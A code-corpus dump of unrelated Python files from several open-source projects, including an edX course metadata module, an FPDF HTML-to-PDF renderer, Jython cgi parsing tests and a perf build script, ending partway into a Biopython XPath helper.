script.module.httplib2/lib/httplib2/test/test_no_socket.py
|
306
|
"""Tests for httplib2 when the socket module is missing.
This helps ensure compatibility with environments such as AppEngine.
"""
import os
import sys
import unittest
import httplib2
class MissingSocketTest(unittest.TestCase):
def setUp(self):
self._oldsocks = httplib2.socks
httplib2.socks = None
def tearDown(self):
httplib2.socks = self._oldsocks
def testProxyDisabled(self):
proxy_info = httplib2.ProxyInfo('blah',
'localhost', 0)
client = httplib2.Http(proxy_info=proxy_info)
self.assertRaises(httplib2.ProxiesUnavailableError,
client.request, 'http://localhost:-1/')
|
medallia/aurora
|
refs/heads/master
|
src/main/python/apache/aurora/common/auth/__init__.py
|
296
|
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
|
IndonesiaX/edx-platform
|
refs/heads/master
|
cms/djangoapps/models/settings/course_metadata.py
|
4
|
"""
Django module for Course Metadata class -- manages advanced settings and related parameters
"""
from xblock.fields import Scope
from xmodule.modulestore.django import modulestore
from django.utils.translation import ugettext as _
from django.conf import settings
class CourseMetadata(object):
'''
For CRUD operations on metadata fields which do not have specific editors
on the other pages, including any user-generated ones.
The objects have no predefined attrs but instead are obj encodings of the
editable metadata.
'''
# The list of fields that wouldn't be shown in Advanced Settings.
# Should not be used directly. Instead the filtered_list method should
# be used if the field needs to be filtered depending on the feature flag.
FILTERED_LIST = [
'cohort_config',
'xml_attributes',
'start',
'end',
'enrollment_start',
'enrollment_end',
'tabs',
'graceperiod',
'show_timezone',
'format',
'graded',
'hide_from_toc',
'pdf_textbooks',
'user_partitions',
'name', # from xblock
'tags', # from xblock
'visible_to_staff_only',
'group_access',
'pre_requisite_courses',
'entrance_exam_enabled',
'entrance_exam_minimum_score_pct',
'entrance_exam_id',
'is_entrance_exam',
'in_entrance_exam',
'language',
'certificates',
'minimum_grade_credit',
'default_time_limit_minutes',
'is_proctored_enabled',
'is_time_limited',
'is_practice_exam',
'exam_review_rules',
'self_paced'
]
@classmethod
def filtered_list(cls):
"""
Return the filtered list of fields, extended according to which feature flags are enabled or disabled.
"""
# Copy the filtered list to avoid permanently changing the class attribute.
filtered_list = list(cls.FILTERED_LIST)
# Do not show giturl if feature is not enabled.
if not settings.FEATURES.get('ENABLE_EXPORT_GIT'):
filtered_list.append('giturl')
# Do not show edxnotes if the feature is disabled.
if not settings.FEATURES.get('ENABLE_EDXNOTES'):
filtered_list.append('edxnotes')
# Do not show video_upload_pipeline if the feature is disabled.
if not settings.FEATURES.get('ENABLE_VIDEO_UPLOAD_PIPELINE'):
filtered_list.append('video_upload_pipeline')
# Do not show facebook_url if the feature is disabled.
if not settings.FEATURES.get('ENABLE_MOBILE_SOCIAL_FACEBOOK_FEATURES'):
filtered_list.append('facebook_url')
# Do not show social sharing url field if the feature is disabled.
if (not hasattr(settings, 'SOCIAL_SHARING_SETTINGS') or
not getattr(settings, 'SOCIAL_SHARING_SETTINGS', {}).get("CUSTOM_COURSE_URLS")):
filtered_list.append('social_sharing_url')
# Do not show teams configuration if feature is disabled.
if not settings.FEATURES.get('ENABLE_TEAMS'):
filtered_list.append('teams_configuration')
if not settings.FEATURES.get('ENABLE_VIDEO_BUMPER'):
filtered_list.append('video_bumper')
# Do not show enable_ccx if feature is not enabled.
if not settings.FEATURES.get('CUSTOM_COURSES_EDX'):
filtered_list.append('enable_ccx')
return filtered_list
@classmethod
def fetch(cls, descriptor):
"""
Fetch the key:value editable course details for the given course from
persistence and return a CourseMetadata model.
"""
result = {}
metadata = cls.fetch_all(descriptor)
for key, value in metadata.iteritems():
if key in cls.filtered_list():
continue
result[key] = value
return result
@classmethod
def fetch_all(cls, descriptor):
"""
Fetches all key:value pairs from persistence and returns a CourseMetadata model.
"""
result = {}
for field in descriptor.fields.values():
if field.scope != Scope.settings:
continue
result[field.name] = {
'value': field.read_json(descriptor),
'display_name': _(field.display_name), # pylint: disable=translation-of-non-string
'help': _(field.help), # pylint: disable=translation-of-non-string
'deprecated': field.runtime_options.get('deprecated', False)
}
return result
@classmethod
def update_from_json(cls, descriptor, jsondict, user, filter_tabs=True):
"""
Decode the json into CourseMetadata and save any changed attrs to the db.
Ensures none of the fields are in the blacklist.
"""
filtered_list = cls.filtered_list()
# Don't filter on the tab attribute if filter_tabs is False.
if not filter_tabs:
filtered_list.remove("tabs")
# Validate the values before actually setting them.
key_values = {}
for key, model in jsondict.iteritems():
# should it be an error if one of the filtered list items is in the payload?
if key in filtered_list:
continue
try:
val = model['value']
if hasattr(descriptor, key) and getattr(descriptor, key) != val:
key_values[key] = descriptor.fields[key].from_json(val)
except (TypeError, ValueError) as err:
raise ValueError(_("Incorrect format for field '{name}'. {detailed_message}").format(
name=model['display_name'], detailed_message=err.message))
return cls.update_from_dict(key_values, descriptor, user)
@classmethod
def validate_and_update_from_json(cls, descriptor, jsondict, user, filter_tabs=True):
"""
Validate the values in the json dict (validated by xblock fields from_json method)
If all fields validate, go ahead and update those values on the object and return it without
persisting it to the DB.
If not, return the error objects list.
Returns:
did_validate: whether values pass validation or not
errors: list of error objects
result: the updated course metadata or None if error
"""
filtered_list = cls.filtered_list()
if not filter_tabs:
filtered_list.remove("tabs")
filtered_dict = dict((k, v) for k, v in jsondict.iteritems() if k not in filtered_list)
did_validate = True
errors = []
key_values = {}
updated_data = None
for key, model in filtered_dict.iteritems():
try:
val = model['value']
if hasattr(descriptor, key) and getattr(descriptor, key) != val:
key_values[key] = descriptor.fields[key].from_json(val)
except (TypeError, ValueError) as err:
did_validate = False
errors.append({'message': err.message, 'model': model})
# If did validate, go ahead and update the metadata
if did_validate:
updated_data = cls.update_from_dict(key_values, descriptor, user, save=False)
return did_validate, errors, updated_data
@classmethod
def update_from_dict(cls, key_values, descriptor, user, save=True):
"""
Update metadata descriptor from key_values. Saves to modulestore if save is true.
"""
for key, value in key_values.iteritems():
setattr(descriptor, key, value)
if save and len(key_values):
modulestore().update_item(descriptor, user.id)
return cls.fetch(descriptor)
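# Illustrative payload shape for update_from_json (a hypothetical example,
# not part of the original module): each key is a field name mapping to a
# model dict whose 'value' is validated through the xblock field, e.g.
#
#     CourseMetadata.update_from_json(
#         descriptor,
#         {"display_name": {"value": "Demo Course",
#                           "display_name": "Course Display Name"}},
#         user,
#     )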
|
shashisp/blumix-webpy
|
refs/heads/master
|
app/gluon/contrib/fpdf/html.py
|
41
|
# -*- coding: latin-1 -*-
"HTML Renderer for FPDF.py"
__author__ = "Mariano Reingart <reingart@gmail.com>"
__copyright__ = "Copyright (C) 2010 Mariano Reingart"
__license__ = "LGPL 3.0"
# Inspired by tuto5.py and several examples from fpdf.org, html2fpdf, etc.
from fpdf import FPDF
from HTMLParser import HTMLParser
DEBUG = False
def px2mm(px):
return int(px)*25.4/72.0
def hex2dec(color = "#000000"):
if color:
r = int(color[1:3], 16)
g = int(color[3:5], 16)
b = int(color[5:7], 16)
return r, g, b
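# Quick sanity examples for the two helpers above (comments only):
#   px2mm(96)          -> 33.866...   (96 px at 72 dpi, converted to mm)
#   hex2dec("#ff8000") -> (255, 128, 0)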
class HTML2FPDF(HTMLParser):
"Render basic HTML to FPDF"
def __init__(self, pdf, image_map=None):
HTMLParser.__init__(self)
self.style = {}
self.pre = False
self.href = ''
self.align = ''
self.page_links = {}
self.font = None
self.font_stack = []
self.pdf = pdf
self.image_map = image_map or (lambda src: src)
self.r = self.g = self.b = 0
self.indent = 0
self.bullet = []
self.set_font("times", 12)
self.font_face = "times" # initialize font
self.color = 0 #initialize font color
self.table = None # table attributes
self.table_col_width = None # column (header) widths
self.table_col_index = None # current column index
self.td = None # cell attributes
self.th = False # header enabled
self.tr = None
self.theader = None # table header cells
self.tfooter = None # table footer cells
self.thead = None
self.tfoot = None
self.theader_out = self.tfooter_out = False
self.hsize = dict(h1=2, h2=1.5, h3=1.17, h4=1, h5=0.83, h6=0.67)
def width2mm(self, length):
if length[-1]=='%':
total = self.pdf.w - self.pdf.r_margin - self.pdf.l_margin
if self.table['width'][-1]=='%':
total *= int(self.table['width'][:-1])/100.0
return int(length[:-1]) * total / 101.0
else:
return int(length) / 6.0
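# Worked example (assuming defaults): with roughly 190 mm of printable
# width on an A4 page and a table declared width="100%", total ~= 190,
# so width2mm("50%") ~= 50 * 190 / 101.0 ~= 94 mm (the 101.0 divisor
# appears to leave about 1% of slack); a bare number such as "240" is
# instead scaled down as 240 / 6.0 = 40 mm.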
def handle_data(self, txt):
if self.td is not None: # drawing a table?
if 'width' not in self.td and 'colspan' not in self.td:
try:
l = [self.table_col_width[self.table_col_index]]
except IndexError:
raise RuntimeError("Table column/cell width not specified, unable to continue")
elif 'colspan' in self.td:
i = self.table_col_index
colspan = int(self.td['colspan'])
l = self.table_col_width[i:i+colspan]
else:
l = [self.td.get('width','240')]
w = sum([self.width2mm(length) for length in l])
h = int(self.td.get('height', 0)) / 4 or self.h*1.30
self.table_h = h
border = int(self.table.get('border', 0))
if not self.th:
align = self.td.get('align', 'L')[0].upper()
border = border and 'LR'
else:
self.set_style('B',True)
border = border or 'B'
align = self.td.get('align', 'C')[0].upper()
bgcolor = hex2dec(self.td.get('bgcolor', self.tr.get('bgcolor', '')))
# parsing table header/footer (drawn later):
if self.thead is not None:
self.theader.append(((w,h,txt,border,0,align), bgcolor))
if self.tfoot is not None:
self.tfooter.append(((w,h,txt,border,0,align), bgcolor))
# check if reached end of page, add table footer and header:
height = h + (self.tfooter and self.tfooter[0][0][1] or 0)
if self.pdf.y+height>self.pdf.page_break_trigger and not self.th:
self.output_table_footer()
self.pdf.add_page()
self.theader_out = self.tfooter_out = False
if self.tfoot is None and self.thead is None:
if not self.theader_out:
self.output_table_header()
self.box_shadow(w, h, bgcolor)
if DEBUG: print "td cell", self.pdf.x, w, txt, "*"
self.pdf.cell(w,h,txt,border,0,align)
elif self.table is not None:
# ignore anything else than td inside a table
pass
elif self.align:
if DEBUG: print "cell", txt, "*"
self.pdf.cell(0,self.h,txt,0,1,self.align[0].upper(), self.href)
else:
txt = txt.replace("\n"," ")
if self.href:
self.put_link(self.href,txt)
else:
if DEBUG: print "write", txt, "*"
self.pdf.write(self.h,txt)
def box_shadow(self, w, h, bgcolor):
if DEBUG: print "box_shadow", w, h, bgcolor
if bgcolor:
fill_color = self.pdf.fill_color
self.pdf.set_fill_color(*bgcolor)
self.pdf.rect(self.pdf.x, self.pdf.y, w, h, 'F')
self.pdf.fill_color = fill_color
def output_table_header(self):
if self.theader:
b = self.b
x = self.pdf.x
self.pdf.set_x(self.table_offset)
self.set_style('B',True)
for cell, bgcolor in self.theader:
self.box_shadow(cell[0], cell[1], bgcolor)
self.pdf.cell(*cell)
self.set_style('B',b)
self.pdf.ln(self.theader[0][0][1])
self.pdf.set_x(self.table_offset)
#self.pdf.set_x(x)
self.theader_out = True
def output_table_footer(self):
if self.tfooter:
x = self.pdf.x
self.pdf.set_x(self.table_offset)
#TODO: self.output_table_sep()
for cell, bgcolor in self.tfooter:
self.box_shadow(cell[0], cell[1], bgcolor)
self.pdf.cell(*cell)
self.pdf.ln(self.tfooter[0][0][1])
self.pdf.set_x(x)
if int(self.table.get('border', 0)):
self.output_table_sep()
self.tfooter_out = True
def output_table_sep(self):
self.pdf.set_x(self.table_offset)
x1 = self.pdf.x
y1 = self.pdf.y
w = sum([self.width2mm(length) for length in self.table_col_width])
self.pdf.line(x1,y1,x1+w,y1)
def handle_starttag(self, tag, attrs):
attrs = dict(attrs)
if DEBUG: print "STARTTAG", tag, attrs
if tag=='b' or tag=='i' or tag=='u':
self.set_style(tag,1)
if tag=='a':
self.href=attrs['href']
if tag=='br':
self.pdf.ln(5)
if tag=='p':
self.pdf.ln(5)
if attrs: self.align = attrs.get('align')
if tag in self.hsize:
k = self.hsize[tag]
self.pdf.ln(5*k)
self.pdf.set_text_color(150,0,0)
self.pdf.set_font_size(12 * k)
if attrs: self.align = attrs.get('align')
if tag=='hr':
self.put_line()
if tag=='pre':
self.pdf.set_font('Courier','',11)
self.pdf.set_font_size(11)
self.set_style('B',False)
self.set_style('I',False)
self.pre = True
if tag=='blockquote':
self.set_text_color(100,0,45)
self.pdf.ln(3)
if tag=='ul':
self.indent+=1
self.bullet.append('\x95')
if tag=='ol':
self.indent+=1
self.bullet.append(0)
if tag=='li':
self.pdf.ln(self.h+2)
self.pdf.set_text_color(190,0,0)
bullet = self.bullet[self.indent-1]
if not isinstance(bullet, basestring):
bullet += 1
self.bullet[self.indent-1] = bullet
bullet = "%s. " % bullet
self.pdf.write(self.h,'%s%s ' % (' '*5*self.indent, bullet))
self.set_text_color()
if tag=='font':
# save previous font state:
self.font_stack.append((self.font_face, self.font_size, self.color))
if 'color' in attrs:
color = hex2dec(attrs['color'])
self.set_text_color(*color)
self.color = color
if 'face' in attrs:
face = attrs.get('face').lower()
self.pdf.set_font(face)
self.font_face = face
if 'size' in attrs:
size = int(attrs.get('size'))
self.pdf.set_font(self.font_face, size=int(size))
self.font_size = size
if tag=='table':
self.table = dict([(k.lower(), v) for k,v in attrs.items()])
if not 'width' in self.table:
self.table['width'] = '100%'
if self.table['width'][-1]=='%':
w = self.pdf.w - self.pdf.r_margin - self.pdf.l_margin
w *= int(self.table['width'][:-1])/100.0
self.table_offset = (self.pdf.w-w)/2.0
self.table_col_width = []
self.theader_out = self.tfooter_out = False
self.theader = []
self.tfooter = []
self.thead = None
self.tfoot = None
self.table_h = 0
self.pdf.ln()
if tag=='tr':
self.tr = dict([(k.lower(), v) for k,v in attrs.items()])
self.table_col_index = 0
self.pdf.set_x(self.table_offset)
if tag=='td':
self.td = dict([(k.lower(), v) for k,v in attrs.items()])
if tag=='th':
self.td = dict([(k.lower(), v) for k,v in attrs.items()])
self.th = True
if 'width' in self.td:
self.table_col_width.append(self.td['width'])
if tag=='thead':
self.thead = {}
if tag=='tfoot':
self.tfoot = {}
if tag=='img':
if 'src' in attrs:
x = self.pdf.get_x()
y = self.pdf.get_y()
w = px2mm(attrs.get('width', 0))
h = px2mm(attrs.get('height',0))
if self.align and self.align[0].upper() == 'C':
x = (self.pdf.w-x)/2.0 - w/2.0
self.pdf.image(self.image_map(attrs['src']),
x, y, w, h, link=self.href)
self.pdf.set_x(x+w)
self.pdf.set_y(y+h)
if tag=='b' or tag=='i' or tag=='u':
self.set_style(tag, True)
if tag=='center':
self.align = 'Center'
def handle_endtag(self, tag):
#Closing tag
if DEBUG: print "ENDTAG", tag
if tag=='h1' or tag=='h2' or tag=='h3' or tag=='h4':
self.pdf.ln(6)
self.set_font()
self.set_style()
self.align = None
if tag=='pre':
self.pdf.set_font(self.font or 'Times','',12)
self.pdf.set_font_size(12)
self.pre=False
if tag=='blockquote':
self.set_text_color(0,0,0)
self.pdf.ln(3)
if tag=='strong':
tag='b'
if tag=='em':
tag='i'
if tag=='b' or tag=='i' or tag=='u':
self.set_style(tag, False)
if tag=='a':
self.href=''
if tag=='p':
self.align=''
if tag in ('ul', 'ol'):
self.indent-=1
self.bullet.pop()
if tag=='table':
if not self.tfooter_out:
self.output_table_footer()
self.table = None
self.th = False
self.theader = None
self.tfooter = None
self.pdf.ln()
if tag=='thead':
self.thead = None
if tag=='tfoot':
self.tfoot = None
if tag=='tbody':
# draw a line separator between table bodies
self.pdf.set_x(self.table_offset)
self.output_table_sep()
if tag=='tr':
h = self.table_h
if self.tfoot is None:
self.pdf.ln(h)
self.tr = None
if tag=='td' or tag=='th':
if self.th:
if DEBUG: print "revert style"
self.set_style('B', False) # revert style
self.table_col_index += int(self.td.get('colspan','1'))
self.td = None
self.th = False
if tag=='font':
# recover last font state
face, size, color = self.font_stack.pop()
if face:
self.pdf.set_text_color(0,0,0)
self.color = None
self.set_font(face, size)
self.font = None
if tag=='center':
self.align = None
def set_font(self, face=None, size=None):
if face:
self.font_face = face
if size:
self.font_size = size
self.h = size / 72.0*25.4
if DEBUG: print "H", self.h
self.pdf.set_font(self.font_face or 'times','',12)
self.pdf.set_font_size(self.font_size or 12)
self.set_style('u', False)
self.set_style('b', False)
self.set_style('i', False)
self.set_text_color()
def set_style(self, tag=None, enable=None):
#Modify style and select corresponding font
if tag:
t = self.style.get(tag.lower())
self.style[tag.lower()] = enable
style=''
for s in ('b','i','u'):
if self.style.get(s):
style+=s
if DEBUG: print "SET_FONT_STYLE", style
self.pdf.set_font('',style)
def set_text_color(self, r=None, g=0, b=0):
if r is None:
self.pdf.set_text_color(self.r,self.g,self.b)
else:
self.pdf.set_text_color(r, g, b)
self.r = r
self.g = g
self.b = b
def put_link(self, url, txt):
#Put a hyperlink
self.set_text_color(0,0,255)
self.set_style('u', True)
self.pdf.write(5,txt,url)
self.set_style('u', False)
self.set_text_color(0)
def put_line(self):
self.pdf.ln(2)
self.pdf.line(self.pdf.get_x(),self.pdf.get_y(),self.pdf.get_x()+187,self.pdf.get_y())
self.pdf.ln(3)
class HTMLMixin(object):
def write_html(self, text, image_map=None):
"Parse HTML and convert it to PDF"
h2p = HTML2FPDF(self, image_map)
h2p.feed(text)
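# Typical usage (a minimal sketch; the supported HTML subset is whatever
# HTML2FPDF handles above):
#
#     class MyFPDF(FPDF, HTMLMixin):
#         pass
#
#     pdf = MyFPDF()
#     pdf.add_page()
#     pdf.write_html("<h1>Report</h1><p>Hello <b>world</b></p>")
#     pdf.output("report.pdf", "F")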
|
popazerty/bnigma2
|
refs/heads/master
|
lib/python/Components/Converter/ValueBitTest.py
|
165
|
from Converter import Converter
from Components.Element import cached
class ValueBitTest(Converter, object):
def __init__(self, arg):
Converter.__init__(self, arg)
self.value = int(arg)
@cached
def getBoolean(self):
return self.source.value & self.value and True or False
boolean = property(getBoolean)
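# Skin usage sketch (assumed syntax, for illustration): the converter
# argument is the bit mask to test against the source value, so e.g.
#
#     <convert type="ValueBitTest">4</convert>
#
# yields True whenever bit 2 of the source value is set.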
|
alexbruy/QGIS
|
refs/heads/master
|
scripts/qgis_fixes/fix_print_with_import.py
|
77
|
from libfuturize.fixes.fix_print_with_import import FixPrintWithImport as FixPrintWithImportOrig
from lib2to3.fixer_util import Node, Leaf, syms, find_indentation
import re
class FixPrintWithImport(FixPrintWithImportOrig):
def transform(self, node, results):
if "fix_print_with_import" in node.prefix:
return node
r = super(FixPrintWithImport, self).transform(node, results)
if not r or r == node:
return r
if not r.prefix:
indentation = find_indentation(node)
r.prefix = "# fix_print_with_import\n" + indentation
else:
r.prefix = re.sub('([ \t]*$)', r'\1# fix_print_with_import\n\1', r.prefix)
return r
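# Effect of the fixer (illustrative): a statement such as
#
#     print "done"
#
# becomes, after the marker comment is prepended to keep the fixer
# idempotent on re-runs:
#
#     # fix_print_with_import
#     print("done")
#
# (the libfuturize parent class is also expected to add the matching
# __future__ import, hence the fixer's name).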
|
matthewelse/micropython
|
refs/heads/emscripten
|
tests/micropython/viper_ptr8_store.py
|
93
|
# test ptr8 type
@micropython.viper
def set(dest:ptr8, val:int):
dest[0] = val
@micropython.viper
def set1(dest:ptr8, val:int):
dest[1] = val
@micropython.viper
def memset(dest:ptr8, val:int, n:int):
for i in range(n):
dest[i] = val
@micropython.viper
def memset2(dest_in, val:int):
dest = ptr8(dest_in)
n = int(len(dest_in))
for i in range(n):
dest[i] = val
b = bytearray(4)
print(b)
set(b, 41)
print(b)
set1(b, 42)
print(b)
memset(b, 43, len(b))
print(b)
memset2(b, 44)
print(b)
|
zephyrplugins/zephyr
|
refs/heads/master
|
zephyr.plugin.jython/jython2.5.2rc3/Lib/test/test_cgi.py
|
24
|
from test.test_support import verify, verbose
import cgi
import os
import sys
import tempfile
from StringIO import StringIO
class HackedSysModule:
# The regression test will have real values in sys.argv, which
# will completely confuse the test of the cgi module
argv = []
stdin = sys.stdin
cgi.sys = HackedSysModule()
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
class ComparableException:
def __init__(self, err):
self.err = err
def __str__(self):
return str(self.err)
def __cmp__(self, anExc):
if not isinstance(anExc, Exception):
return -1
x = cmp(self.err.__class__, anExc.__class__)
if x != 0:
return x
return cmp(self.err.args, anExc.args)
def __getattr__(self, attr):
return getattr(self.err, attr)
def do_test(buf, method):
env = {}
if method == "GET":
fp = None
env['REQUEST_METHOD'] = 'GET'
env['QUERY_STRING'] = buf
elif method == "POST":
fp = StringIO(buf)
env['REQUEST_METHOD'] = 'POST'
env['CONTENT_TYPE'] = 'application/x-www-form-urlencoded'
env['CONTENT_LENGTH'] = str(len(buf))
else:
raise ValueError, "unknown method: %s" % method
try:
return cgi.parse(fp, env, strict_parsing=1)
except StandardError, err:
return ComparableException(err)
# A list of test cases. Each test case is a two-tuple that contains
# a string with the query and a dictionary with the expected result.
parse_qsl_test_cases = [
("", []),
("&", []),
("&&", []),
("=", [('', '')]),
("=a", [('', 'a')]),
("a", [('a', '')]),
("a=", [('a', '')]),
("a=", [('a', '')]),
("&a=b", [('a', 'b')]),
("a=a+b&b=b+c", [('a', 'a b'), ('b', 'b c')]),
("a=1&a=2", [('a', '1'), ('a', '2')]),
]
parse_strict_test_cases = [
("", ValueError("bad query field: ''")),
("&", ValueError("bad query field: ''")),
("&&", ValueError("bad query field: ''")),
(";", ValueError("bad query field: ''")),
(";&;", ValueError("bad query field: ''")),
# Should the next few really be valid?
("=", {}),
("=&=", {}),
("=;=", {}),
# The rest seem to make sense
("=a", {'': ['a']}),
("&=a", ValueError("bad query field: ''")),
("=a&", ValueError("bad query field: ''")),
("=&a", ValueError("bad query field: 'a'")),
("b=a", {'b': ['a']}),
("b+=a", {'b ': ['a']}),
("a=b=a", {'a': ['b=a']}),
("a=+b=a", {'a': [' b=a']}),
("&b=a", ValueError("bad query field: ''")),
("b&=a", ValueError("bad query field: 'b'")),
("a=a+b&b=b+c", {'a': ['a b'], 'b': ['b c']}),
("a=a+b&a=b+a", {'a': ['a b', 'b a']}),
("x=1&y=2.0&z=2-3.%2b0", {'x': ['1'], 'y': ['2.0'], 'z': ['2-3.+0']}),
("x=1;y=2.0&z=2-3.%2b0", {'x': ['1'], 'y': ['2.0'], 'z': ['2-3.+0']}),
("x=1;y=2.0;z=2-3.%2b0", {'x': ['1'], 'y': ['2.0'], 'z': ['2-3.+0']}),
("Hbc5161168c542333633315dee1182227:key_store_seqid=400006&cuyer=r&view=bustomer&order_id=0bb2e248638833d48cb7fed300000f1b&expire=964546263&lobale=en-US&kid=130003.300038&ss=env",
{'Hbc5161168c542333633315dee1182227:key_store_seqid': ['400006'],
'cuyer': ['r'],
'expire': ['964546263'],
'kid': ['130003.300038'],
'lobale': ['en-US'],
'order_id': ['0bb2e248638833d48cb7fed300000f1b'],
'ss': ['env'],
'view': ['bustomer'],
}),
("group_id=5470&set=custom&_assigned_to=31392&_status=1&_category=100&SUBMIT=Browse",
{'SUBMIT': ['Browse'],
'_assigned_to': ['31392'],
'_category': ['100'],
'_status': ['1'],
'group_id': ['5470'],
'set': ['custom'],
})
]
def norm(list):
if type(list) == type([]):
list.sort()
return list
def first_elts(list):
return map(lambda x:x[0], list)
def first_second_elts(list):
return map(lambda p:(p[0], p[1][0]), list)
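# Small examples of the helpers above (comments only):
#   norm([('b', 1), ('a', 2)])         -> [('a', 2), ('b', 1)]
#   first_elts([('a', 1), ('b', 2)])   -> ['a', 'b']
#   first_second_elts([('a', [1, 9])]) -> [('a', 1)]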
def main():
for orig, expect in parse_qsl_test_cases:
result = cgi.parse_qsl(orig, keep_blank_values=True)
print repr(orig), '=>', result
verify(result == expect, "Error parsing %s" % repr(orig))
for orig, expect in parse_strict_test_cases:
# Test basic parsing
print repr(orig)
d = do_test(orig, "GET")
verify(d == expect, "Error parsing %s" % repr(orig))
d = do_test(orig, "POST")
verify(d == expect, "Error parsing %s" % repr(orig))
env = {'QUERY_STRING': orig}
fcd = cgi.FormContentDict(env)
sd = cgi.SvFormContentDict(env)
fs = cgi.FieldStorage(environ=env)
if type(expect) == type({}):
# test dict interface
verify(len(expect) == len(fcd))
verify(norm(expect.keys()) == norm(fcd.keys()))
verify(norm(expect.values()) == norm(fcd.values()))
verify(norm(expect.items()) == norm(fcd.items()))
verify(fcd.get("nonexistent field", "default") == "default")
verify(len(sd) == len(fs))
verify(norm(sd.keys()) == norm(fs.keys()))
verify(fs.getvalue("nonexistent field", "default") == "default")
# test individual fields
for key in expect.keys():
expect_val = expect[key]
verify(fcd.has_key(key))
verify(norm(fcd[key]) == norm(expect[key]))
verify(fcd.get(key, "default") == fcd[key])
verify(fs.has_key(key))
if len(expect_val) > 1:
single_value = 0
else:
single_value = 1
try:
val = sd[key]
except IndexError:
verify(not single_value)
verify(fs.getvalue(key) == expect_val)
else:
verify(single_value)
verify(val == expect_val[0])
verify(fs.getvalue(key) == expect_val[0])
verify(norm(sd.getlist(key)) == norm(expect_val))
if single_value:
verify(norm(sd.values()) == \
first_elts(norm(expect.values())))
verify(norm(sd.items()) == \
first_second_elts(norm(expect.items())))
# Test the weird FormContentDict classes
env = {'QUERY_STRING': "x=1&y=2.0&z=2-3.%2b0&1=1abc"}
expect = {'x': 1, 'y': 2.0, 'z': '2-3.+0', '1': '1abc'}
d = cgi.InterpFormContentDict(env)
for k, v in expect.items():
verify(d[k] == v)
for k, v in d.items():
verify(expect[k] == v)
verify(norm(expect.values()) == norm(d.values()))
print "Testing log"
cgi.log("Testing")
cgi.logfp = sys.stdout
cgi.initlog("%s", "Testing initlog 1")
cgi.log("%s", "Testing log 2")
if os.path.exists("/dev/null"):
cgi.logfp = None
cgi.logfile = "/dev/null"
cgi.initlog("%s", "Testing log 3")
cgi.log("Testing log 4")
print "Test FieldStorage methods that use readline"
# FieldStorage uses readline, which has the capacity to read all
# contents of the input file into memory; we use readline's size argument
# to prevent that for files that do not contain any newlines in
# non-GET/HEAD requests
class TestReadlineFile:
def __init__(self, file):
self.file = file
self.numcalls = 0
def readline(self, size=None):
self.numcalls += 1
if size:
return self.file.readline(size)
else:
return self.file.readline()
def __getattr__(self, name):
file = self.__dict__['file']
a = getattr(file, name)
if not isinstance(a, int):
setattr(self, name, a)
return a
f = TestReadlineFile(tempfile.TemporaryFile())
f.write('x' * 256 * 1024)
f.seek(0)
env = {'REQUEST_METHOD':'PUT'}
fs = cgi.FieldStorage(fp=f, environ=env)
# if we're not chunking properly, readline is only called twice
# (by read_binary); if we are chunking properly, it will be called 5 times
# as long as the chunksize is 1 << 16.
verify(f.numcalls > 2)
print "Test basic FieldStorage multipart parsing"
env = {'REQUEST_METHOD':'POST', 'CONTENT_TYPE':'multipart/form-data; boundary=---------------------------721837373350705526688164684', 'CONTENT_LENGTH':'558'}
postdata = """-----------------------------721837373350705526688164684
Content-Disposition: form-data; name="id"
1234
-----------------------------721837373350705526688164684
Content-Disposition: form-data; name="title"
-----------------------------721837373350705526688164684
Content-Disposition: form-data; name="file"; filename="test.txt"
Content-Type: text/plain
Testing 123.
-----------------------------721837373350705526688164684
Content-Disposition: form-data; name="submit"
Add\x20
-----------------------------721837373350705526688164684--
"""
fs = cgi.FieldStorage(fp=StringIO(postdata), environ=env)
verify(len(fs.list) == 4)
expect = [{'name':'id', 'filename':None, 'value':'1234'},
{'name':'title', 'filename':None, 'value':''},
{'name':'file', 'filename':'test.txt','value':'Testing 123.\n'},
{'name':'submit', 'filename':None, 'value':' Add '}]
for x in range(len(fs.list)):
for k, exp in expect[x].items():
got = getattr(fs.list[x], k)
verify(got == exp)
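    # For illustration (not part of the original test): parsed parts can
    # also be fetched by name rather than by walking fs.list, e.g.
    #   fs.getvalue("id")        ->  '1234'
    #   fs["file"].filename      ->  'test.txt'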
main()
|
project-revolution/android_kernel_sony_msm8974
|
refs/heads/cm-10.2
|
tools/perf/util/setup.py
|
4998
|
#!/usr/bin/python2

from distutils.core import setup, Extension
from os import getenv

from distutils.command.build_ext import build_ext as _build_ext
from distutils.command.install_lib import install_lib as _install_lib

class build_ext(_build_ext):
    def finalize_options(self):
        _build_ext.finalize_options(self)
        self.build_lib = build_lib
        self.build_temp = build_tmp

class install_lib(_install_lib):
    def finalize_options(self):
        _install_lib.finalize_options(self)
        self.build_dir = build_lib

cflags = ['-fno-strict-aliasing', '-Wno-write-strings']
cflags += getenv('CFLAGS', '').split()

build_lib = getenv('PYTHON_EXTBUILD_LIB')
build_tmp = getenv('PYTHON_EXTBUILD_TMP')

ext_sources = [f.strip() for f in file('util/python-ext-sources')
               if len(f.strip()) > 0 and f[0] != '#']

perf = Extension('perf',
                 sources = ext_sources,
                 include_dirs = ['util/include'],
                 extra_compile_args = cflags,
                 )

setup(name='perf',
      version='0.1',
      description='Interface with the Linux profiling infrastructure',
      author='Arnaldo Carvalho de Melo',
      author_email='acme@redhat.com',
      license='GPLv2',
      url='http://perf.wiki.kernel.org',
      ext_modules=[perf],
      cmdclass={'build_ext': build_ext, 'install_lib': install_lib})
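
# Build sketch (not part of the original file; the exact Makefile rule and
# staging paths are assumptions): the perf build exports the two staging
# directories and then runs something like
#   PYTHON_EXTBUILD_LIB=.../python_ext_build/lib/ \
#   PYTHON_EXTBUILD_TMP=.../python_ext_build/tmp/ \
#       python2 util/setup.py --quiet build_ext
# after which the resulting perf.so can be imported from Python, e.g.
#   import perf
#   print perf.cpu_map()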
|
dbmi-pitt/DIKB-Micropublication
|
refs/heads/master
|
scripts/mp-scripts/Bio/Mindy/XPath.py
|
1
|
import xml.sax, re

from Bio import Std

# To help parse XPath queries
_name = "[a-zA-Z_:][-a-zA-Z0-9._:]*"
_pat_tag_re = re.compile(r"""^//(%s)(\[@(%s)=("[^"]*"|'[^']*')\])?$""" %
                         (_name, _name) )
#') # emacs cruft

def parse_simple_xpath(s):
